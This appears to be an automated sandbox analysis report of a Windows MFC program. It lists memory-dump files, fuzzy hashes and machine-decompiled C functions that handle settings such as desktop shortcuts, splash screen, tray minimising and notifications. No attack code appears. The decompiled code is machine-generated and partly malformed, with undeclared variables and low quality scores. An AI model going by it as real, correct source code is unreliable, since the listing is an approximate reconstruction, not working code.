Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$#364H_prolog
String ID: zdB
API String ID: 284120412-1063565963
Opcode ID: 3864e093cc0676021a5be9eb85984084e39143b40d7220fff71db1c046398dd0
Instruction ID: e77148fc78e65977808dbeec608d98554094af6fc1e0bfa885b6128aa3a83444
Opcode Fuzzy Hash: 3864e093cc0676021a5be9eb85984084e39143b40d7220fff71db1c046398dd0
Instruction Fuzzy Hash: 3EF0E271B102608BC700AF44E5013AEB7A6EB80708F91841FE40167241DBF82A00C758

Uniqueness

Uniqueness Score: -1.00%

Function 00401357, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401357(void* __ecx) {
				void* _t11;
				void* _t22;

				L004269E6();
				_push("CClientPrivateComView");
				L00425FB8();
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_push(_t22 - 0x10);
				_t11 = L00402298();
				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
				L00425DFC();
				L00426012();
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}

0x00408c7b
0x00408c84
0x00408c8c
0x00408c91
0x00408c98
0x00408c9a
0x00408c9f
0x00408ca8
0x00408caf
0x00408cb8
0x00408cc0

APIs

_EH_prolog.MSVCRT ref: 00408C7B
#537.MFC42(CClientPrivateComView), ref: 00408C8C
#800.MFC42(CClientPrivateComView), ref: 00408CA8
#4508.MFC42(CClientPrivateComView), ref: 00408CAF

Strings

CClientPrivateComView, xrefs: 00408C84

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4508#537#800H_prolog
String ID: CClientPrivateComView
API String ID: 3708723662-357165002
Opcode ID: 9d75a8f4d665bed23f00885437d8dfae3c57794402d10273b2b60e2ed73f39b4
Instruction ID: 216a4fab9688a2d5bcc5296d325a5af4e87423b3f7e33872cd7bcb6e57350d68
Opcode Fuzzy Hash: 9d75a8f4d665bed23f00885437d8dfae3c57794402d10273b2b60e2ed73f39b4
Instruction Fuzzy Hash: C8E06571A155349BD708EB54E946AFD7374EF04324F50415FA022631D2DFB85E049A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040209A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040209A(void* __ecx) {
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t9 = SendMessageA( *(__ecx + 0x1c0), 0xf0, 0, 0);
				L00425E44();
				_push("ShortcutDesktop");
				_push("Options");
				L0042624C();
				return E0040149C(_t10, _t11, _t9, 0x10);
			}

0x0040eaad
0x0040eac2
0x0040eac4
0x0040eacd
0x0040ead2
0x0040ead9
0x0040eaea

APIs

SendMessageA.USER32 ref: 0040EABC
#1168.MFC42 ref: 0040EAC4
#6402.MFC42(Options,ShortcutDesktop,00000000), ref: 0040EAD9

Part of subcall function 0040149C: _EH_prolog.MSVCRT ref: 0040EB8C
Part of subcall function 0040149C: #540.MFC42 ref: 0040EB9E
Part of subcall function 0040149C: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EBC1
Part of subcall function 0040149C: #860.MFC42(?), ref: 0040EBD1
Part of subcall function 0040149C: #860.MFC42(00442184,?), ref: 0040EBDE
Part of subcall function 0040149C: #860.MFC42(00442188,00442184,?), ref: 0040EBEB
Part of subcall function 0040149C: #537.MFC42(00008085,00442188,00442184,?), ref: 0040EBF8
Part of subcall function 0040149C: #858.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC05
Part of subcall function 0040149C: #800.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC11
Part of subcall function 0040149C: #860.MFC42(?,00000000,00008085,00442188,00442184,?), ref: 0040EC20
Part of subcall function 0040149C: SHGetSpecialFolderLocation.SHELL32(00000001,?,?,?,00000000,00008085,00442188,00442184,?), ref: 0040EC42
Part of subcall function 0040149C: SHGetPathFromIDListA.SHELL32(?,?), ref: 0040EC56
Part of subcall function 0040149C: #537.MFC42(0000E000), ref: 0040EC64
Part of subcall function 0040149C: #2818.MFC42(?,%s\%s.lnk,0000E000,00000000,0000E000), ref: 0040EC7F
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040EC8E
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040ECE9

Strings

Options, xrefs: 0040EAD2
ShortcutDesktop, xrefs: 0040EACD

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$#800$#537$#1168#2818#540#6402#858FileFolderFromH_prologListLocationMessageModuleNamePathSendSpecial
String ID: Options$ShortcutDesktop
API String ID: 1573633511-1496474088
Opcode ID: 76fb228f472cd5ec10234de403804e1252d38ab01be98b29024a865a7a9b80f2
Instruction ID: c228bbb561498d670e9cd750f752ed225a1370358ef65f2551f868151dc702de
Opcode Fuzzy Hash: 76fb228f472cd5ec10234de403804e1252d38ab01be98b29024a865a7a9b80f2
Instruction Fuzzy Hash: 3DE0863538031076E6206326AC0BF5B19549BC5B10F11046AB2057B1E2CDB9A81195AC

Uniqueness

Uniqueness Score: -1.00%

Function 004021DF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004021DF(intOrPtr __ecx) {
				void* _t19;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t19 - 0x10)) = __ecx;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0x42e34c;
				 *((intOrPtr*)(_t19 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0x42ea40;
				 *((char*)(_t19 - 4)) = 2;
				L004260F6();
				 *((intOrPtr*)(__ecx)) = 0x42ef98;
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return __ecx;
			}

0x0042078c
0x00420791
0x00420795
0x00420798
0x0042079f
0x004207a6
0x004207a9
0x004207ac
0x004207af
0x004207b9
0x004207bd
0x004207c5
0x004207ce
0x004207d6

APIs

_EH_prolog.MSVCRT ref: 0042078C
#567.MFC42 ref: 00420798
#567.MFC42 ref: 004207BD

Strings

LB, xrefs: 0042079F
@B, xrefs: 004207AF

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$H_prolog
String ID: @B$LB
API String ID: 2890482678-4194680055
Opcode ID: 916cffb69657544639ea92e2657bcc8a85f57dd9eb22c206ec8be151c9bad691
Instruction ID: c568bc45f9b037afc3b98fbfa0d187122afa30698cdea2f0ba4032705a992e9a
Opcode Fuzzy Hash: 916cffb69657544639ea92e2657bcc8a85f57dd9eb22c206ec8be151c9bad691
Instruction Fuzzy Hash: E9F012B0A107B0DFC320DF59A50125ABBE4AB0470CB51886F9446D3B41D7F89504DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040105F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040105F(void* __ecx) {
				long _t3;

				_t3 = SendMessageA( *(__ecx + 0x80), 0xf0, 0, 0);
				L00425E44();
				_push(_t3);
				_push("ShowSplash");
				_push("Options");
				L0042624C();
				return  *((intOrPtr*)(_t3 + 4));
			}

0x0040ed20
0x0040ed28
0x0040ed30
0x0040ed31
0x0040ed36
0x0040ed3d
0x0040ed43

APIs

SendMessageA.USER32 ref: 0040ED20
#1168.MFC42 ref: 0040ED28
#6402.MFC42(Options,ShowSplash,00000000), ref: 0040ED3D

Strings

Options, xrefs: 0040ED36
ShowSplash, xrefs: 0040ED31

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: Options$ShowSplash
API String ID: 1634721603-2722220132
Opcode ID: 0b8d7a14fcaa51274c82d43ebc30593f81eb3541df6f96e8e6ed1b90c0563b79
Instruction ID: 6b35543df84e445c69a3a571cc04efd07b8514cfc67e6df6e3086868cf9e4c49
Opcode Fuzzy Hash: 0b8d7a14fcaa51274c82d43ebc30593f81eb3541df6f96e8e6ed1b90c0563b79
Instruction Fuzzy Hash: 03D0A7303C032177EE2073216C0FF4A29409F40754F2104B6B2057F1D2CC7A6851C29C

Uniqueness

Uniqueness Score: -1.00%

Function 0040146F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040146F(void* __ecx) {
				long _t3;

				_t3 = SendMessageA( *(__ecx + 0x180), 0xf0, 0, 0);
				L00425E44();
				_push(_t3);
				_push("MinimizeToTray");
				_push("Options");
				L0042624C();
				return  *((intOrPtr*)(_t3 + 4));
			}

0x0040ea43
0x0040ea4b
0x0040ea53
0x0040ea54
0x0040ea59
0x0040ea60
0x0040ea66

APIs

SendMessageA.USER32 ref: 0040EA43
#1168.MFC42 ref: 0040EA4B
#6402.MFC42(Options,MinimizeToTray,00000000), ref: 0040EA60

Strings

MinimizeToTray, xrefs: 0040EA54
Options, xrefs: 0040EA59

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: MinimizeToTray$Options
API String ID: 1634721603-2234159149
Opcode ID: c369a7641c29d34c850f334fc6328f6ec3693ea1105e814714bf9fd7958535ce
Instruction ID: 663428b875e79ea23b04f4c30adeb207ea63eb05956c9ad91bf12f26785f03ff
Opcode Fuzzy Hash: c369a7641c29d34c850f334fc6328f6ec3693ea1105e814714bf9fd7958535ce
Instruction Fuzzy Hash: D4D0A73038032077DA20A331BC0FF8629405F14714F2104B6B2057F1D2CCB96811869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040141A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040141A(void* __ecx) {
				long _t3;

				_t3 = SendMessageA( *(__ecx + 0xc0), 0xf0, 0, 0);
				L00425E44();
				_push(_t3);
				_push("NotifyAdd");
				_push("Options");
				L0042624C();
				return  *((intOrPtr*)(_t3 + 4));
			}

0x0040eafb
0x0040eb03
0x0040eb0b
0x0040eb0c
0x0040eb11
0x0040eb18
0x0040eb1e

APIs

SendMessageA.USER32 ref: 0040EAFB
#1168.MFC42 ref: 0040EB03
#6402.MFC42(Options,NotifyAdd,00000000), ref: 0040EB18

Strings

Options, xrefs: 0040EB11
NotifyAdd, xrefs: 0040EB0C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: NotifyAdd$Options
API String ID: 1634721603-3940889958
Opcode ID: 28ca0eb29e94edee5fce034adac248fb17b44f843218bc5b0fc9537e9c17c21e
Instruction ID: 1e43b4d701ba7e3c49982294569acd9f91b3b648fe27e72cd290ef54bf78581a
Opcode Fuzzy Hash: 28ca0eb29e94edee5fce034adac248fb17b44f843218bc5b0fc9537e9c17c21e
Instruction Fuzzy Hash: 48D05E31780320A6EA20A3256C0FF462A906B14B14F2148A676047F1D1C8799811C66C

Uniqueness

Uniqueness Score: -1.00%

Function 00415776, Relevance: 7.6, APIs: 5, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00415776(void* __ecx, intOrPtr _a4, int* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HMENU__* _t24;
				signed int _t27;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t36;
				intOrPtr _t37;
				int _t38;
				void* _t39;

				_t39 = __ecx;
				_t38 = 0;
				if(GetMenuItemCount( *(__ecx + 4)) <= 0) {
					L16:
					 *_a8 =  *_a8 | 0xffffffff;
					return 0;
				}
				_t31 = _a12;
				while(1) {
					_t24 = GetSubMenu( *(_t39 + 4), _t38);
					_push(_t24);
					L0042635A();
					if(_t24 == 0) {
						goto L5;
					}
					_t30 = L00401C67(_t24, _a4, _a8, _t31, _a16);
					if(_t30 == 0) {
						L13:
						_t38 = _t38 + 1;
						if(_t38 >= GetMenuItemCount( *(_t39 + 4))) {
							goto L16;
						}
						continue;
					}
					return _t30;
					L5:
					if(_a4 == GetMenuItemID( *(_t39 + 4), _t38)) {
						_t37 =  *((intOrPtr*)(_t31 + 8));
						_t27 = 0;
						if(_t37 <= 0) {
							L15:
							 *_a8 = _t38;
							return _t39;
						}
						_t36 =  *((intOrPtr*)(_t31 + 4));
						while( *((intOrPtr*)(_t36 + _t27 * 4)) != _t39 ||  *((intOrPtr*)( *((intOrPtr*)(_a16 + 4)) + _t27 * 4)) != _t38) {
							_t27 = _t27 + 1;
							if(_t27 >= _t37) {
								goto L15;
							}
						}
						_t31 = _a12;
					}
					goto L13;
				}
			}

0x0041577b
0x0041577e
0x0041578b
0x00415809
0x0041580c
0x00000000
0x0041580f
0x0041578d
0x00415790
0x00415794
0x0041579a
0x0041579b
0x004157a2
0x00000000
0x00000000
0x004157b0
0x004157b7
0x004157f0
0x004157f3
0x004157fc
0x00000000
0x00000000
0x00000000
0x004157fe
0x00415815
0x004157bb
0x004157c8
0x004157ca
0x004157cd
0x004157d1
0x00415800
0x00415803
0x00000000
0x00415805
0x004157d3
0x004157d6
0x004157e6
0x004157e9
0x00000000
0x00000000
0x004157eb
0x004157ed
0x004157ed
0x00000000
0x004157c8

APIs

GetMenuItemCount.USER32 ref: 00415783
GetSubMenu.USER32 ref: 00415794
#2863.MFC42(00000000), ref: 0041579B
GetMenuItemID.USER32(?,00000000), ref: 004157BF
GetMenuItemCount.USER32 ref: 004157F4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$Count$#2863
String ID:
API String ID: 3879678142-0
Opcode ID: ce563c349f3ca956ba372b0fe685573ff057a77edbda2066656f15fe3c8f3806
Instruction ID: bdfd937a5a041253d77168638f19bc5683112051b8f69743b42863461156d2c0
Opcode Fuzzy Hash: ce563c349f3ca956ba372b0fe685573ff057a77edbda2066656f15fe3c8f3806
Instruction Fuzzy Hash: B311B134200A05EFCB119F25CD869EB7BA6FFC53507108426F826CA261E735DC91DB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1D7, Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B1D7(void* __ecx) {
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t119;
				intOrPtr _t145;
				intOrPtr _t147;
				void* _t149;
				intOrPtr _t151;

				_t147 =  *((intOrPtr*)(_t149 - 0x18));
				_t77 =  *((intOrPtr*)(_t149 - 0x30));
				_t145 = 1;
				 *(_t149 - 4) = 0;
				if(_t77 != _t145) {
					__eflags = _t77 - 2;
					if(_t77 != 2) {
						__eflags = _t77 - 5;
						if(__eflags != 0) {
							__eflags = _t77 - 6;
							if(__eflags != 0) {
								__eflags = _t77 - 7;
								if(__eflags != 0) {
									__eflags = _t77 - 3;
									if(_t77 != 3) {
										__eflags = _t77 - 4;
										if(_t77 == 4) {
											_push(__ecx);
											 *((intOrPtr*)(_t149 - 0x14)) = _t151;
											_push(_t149 - 0x34);
											L0042611A();
											_push( *((intOrPtr*)(_t149 - 0x38)));
											 *(_t149 - 4) = 0xe;
											_push(_t151);
											 *((intOrPtr*)(_t149 - 0x20)) = _t151;
											_push(_t149 - 0x3c);
											L0042611A();
											_t81 = _t149 - 0x1c;
											 *(_t149 - 4) = 0;
											_push(_t149 - 0x1c);
											L00425FE8();
											_push(_t151);
											_t119 = _t151;
											 *((intOrPtr*)(_t149 - 0x18)) = _t151;
											goto L15;
										}
									} else {
										_push(__ecx);
										 *((intOrPtr*)(_t149 - 0x14)) = _t151;
										_push(_t149 - 0x34);
										L0042611A();
										_push( *((intOrPtr*)(_t149 - 0x38)));
										 *(_t149 - 4) = 0xc;
										_push(_t151);
										 *((intOrPtr*)(_t149 - 0x20)) = _t151;
										_push(_t149 - 0x3c);
										L0042611A();
										 *(_t149 - 4) = 0;
										_push(_t149 - 0x1c);
										L00425FE8();
										_push(_t151);
										 *((intOrPtr*)(_t149 - 0x18)) = _t151;
										L00401749(_t151, _t149 - 0x1c);
										L00401A96( *((intOrPtr*)(_t147 + 0x14)));
									}
								} else {
									_push(__ecx);
									 *((intOrPtr*)(_t149 - 0x14)) = _t151;
									_push(_t149 - 0x34);
									L0042611A();
									_push( *((intOrPtr*)(_t149 - 0x38)));
									 *(_t149 - 4) = 0xa;
									 *((intOrPtr*)(_t149 - 0x20)) = _t151;
									L0042611A();
									 *(_t149 - 4) = 0;
									L00425FE8();
									 *((intOrPtr*)(_t149 - 0x18)) = _t151;
									L00401749(_t151, _t149 - 0x1c);
									E004014A1( *((intOrPtr*)(_t147 + 0x14)), __eflags, _t151, _t149 - 0x1c, _t149 - 0x3c, _t151);
								}
							} else {
								_push(__ecx);
								 *((intOrPtr*)(_t149 - 0x14)) = _t151;
								_push(_t149 - 0x34);
								L0042611A();
								E00401C49( *((intOrPtr*)(_t147 + 0x14)), __eflags);
							}
						} else {
							_push( *((intOrPtr*)(_t149 - 0x38)));
							_push(__ecx);
							 *((intOrPtr*)(_t149 - 0x14)) = _t151;
							_push(_t149 - 0x34);
							L0042611A();
							E0040207C( *((intOrPtr*)(_t147 + 0x14)), __eflags);
						}
					} else {
						_push(__ecx);
						 *((intOrPtr*)(_t149 - 0x14)) = _t151;
						_push(_t149 - 0x34);
						L0042611A();
						_push( *((intOrPtr*)(_t149 - 0x38)));
						 *(_t149 - 4) = 8;
						_push(_t151);
						 *((intOrPtr*)(_t149 - 0x20)) = _t151;
						_push(_t149 - 0x3c);
						L0042611A();
						_t81 = _t149 - 0x1c;
						 *(_t149 - 4) = 0;
						_push(_t149 - 0x1c);
						L00425FE8();
						_push(_t151);
						_t119 = _t151;
						 *((intOrPtr*)(_t149 - 0x18)) = _t151;
						L15:
						L00401749(_t119, _t81);
						L00401A96( *((intOrPtr*)(_t147 + 0x14)));
						E004020C7( *((intOrPtr*)(_t147 + 0x14)), __eflags);
					}
				} else {
					_push(__ecx);
					 *((intOrPtr*)(_t149 - 0x1c)) = _t151;
					_push(_t149 - 0x34);
					L0042611A();
					_push( *((intOrPtr*)(_t149 - 0x38)));
					 *(_t149 - 4) = 3;
					_push(_t151);
					 *((intOrPtr*)(_t149 - 0x18)) = _t151;
					_push(_t149 - 0x3c);
					L0042611A();
					 *(_t149 - 4) = 0;
					_push(_t149 - 0x20);
					L00425FE8();
					_push(_t151);
					 *((intOrPtr*)(_t149 - 0x14)) = _t151;
					L00401749(_t151, _t149 - 0x20);
					L00401A96( *((intOrPtr*)(_t147 + 0x14)));
					 *(_t149 - 4) = 5;
					L00401A46(_t149 - 0x60);
					_push(_t147 + 0x24);
					 *(_t149 - 4) = 6;
					L00426054();
					_push(0x44215c);
					 *((intOrPtr*)(_t149 - 0x58)) =  *((intOrPtr*)(_t147 + 0x28));
					L004261A4();
					_push(_t149 - 0x60);
					 *((intOrPtr*)(_t149 - 0x50)) = _t145;
					L00401302(_t147);
					 *(_t149 - 4) = 5;
					L00401D48(_t149 - 0x60);
				}
				 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
				_t78 = L00401D48(_t149 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
				return _t78;
			}

0x0040b1d7
0x0040b1dc
0x0040b1e1
0x0040b1e2
0x0040b1e7
0x0040b2b0
0x0040b2b3
0x0040b2f1
0x0040b2f4
0x0040b315
0x0040b318
0x0040b336
0x0040b339
0x0040b385
0x0040b388
0x0040b3d1
0x0040b3d4
0x0040b3d6
0x0040b3dc
0x0040b3df
0x0040b3e0
0x0040b3e5
0x0040b3eb
0x0040b3ef
0x0040b3f2
0x0040b3f5
0x0040b3f6
0x0040b3fb
0x0040b3fe
0x0040b401
0x0040b402
0x0040b407
0x0040b408
0x0040b40a
0x00000000
0x0040b40a
0x0040b38a
0x0040b38a
0x0040b390
0x0040b393
0x0040b394
0x0040b399
0x0040b39f
0x0040b3a3
0x0040b3a6
0x0040b3a9
0x0040b3aa
0x0040b3b2
0x0040b3b5
0x0040b3b6
0x0040b3bb
0x0040b3be
0x0040b3c2
0x0040b3ca
0x0040b3ca
0x0040b33b
0x0040b33b
0x0040b341
0x0040b344
0x0040b345
0x0040b34a
0x0040b350
0x0040b357
0x0040b35b
0x0040b363
0x0040b367
0x0040b36f
0x0040b373
0x0040b37b
0x0040b37b
0x0040b31a
0x0040b31a
0x0040b320
0x0040b323
0x0040b324
0x0040b32c
0x0040b32c
0x0040b2f6
0x0040b2f6
0x0040b2fc
0x0040b2ff
0x0040b302
0x0040b303
0x0040b30b
0x0040b30b
0x0040b2b5
0x0040b2b5
0x0040b2bb
0x0040b2be
0x0040b2bf
0x0040b2c4
0x0040b2ca
0x0040b2ce
0x0040b2d1
0x0040b2d4
0x0040b2d5
0x0040b2da
0x0040b2dd
0x0040b2e0
0x0040b2e1
0x0040b2e6
0x0040b2e7
0x0040b2e9
